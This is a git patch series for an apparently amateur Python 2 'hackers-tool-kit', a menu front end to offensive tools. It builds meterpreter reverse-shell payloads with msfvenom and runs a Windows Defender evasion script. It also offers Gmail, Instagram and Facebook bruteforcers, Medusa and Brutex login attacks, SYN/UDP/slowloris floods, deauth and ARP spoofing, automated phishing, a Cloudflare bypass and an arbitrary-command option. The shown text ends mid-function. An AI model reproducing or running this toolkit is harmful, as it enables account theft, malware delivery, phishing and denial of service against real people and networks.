hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +def terminal(): + os.system("gnome-terminal") +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + found = True +mainbanner() +main() From d7f7c0dbfb43e643d7dd16794d5850e2a2bec3c0 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 25 Mar 2019 08:18:42 +0100 Subject: [PATCH 070/214] Update README.md --- README.md | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index ef06168..553a625 100644 --- a/README.md +++ b/README.md @@ -35,10 +35,11 @@ the htksecure.py file will run the hackers-tool-kit with proxychains and other t # UPDATES this is where i will try to put the most recent updates -* help banner update * added a connect option -* added an about me option - * changed some things in the myip and sysinfo options + +* updated arpspoof option + +* added a open new terminal option From a5d09e905e3f018bed53fc859f76ac3d7e0959bf Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 25 Mar 2019 21:27:56 +0100 Subject: [PATCH 071/214] Delete htk.py --- htk.py | 2029 -------------------------------------------------------- 1 file changed, 2029 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 973e90c..0000000 --- a/htk.py +++ /dev/null @@ -1,2029 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print 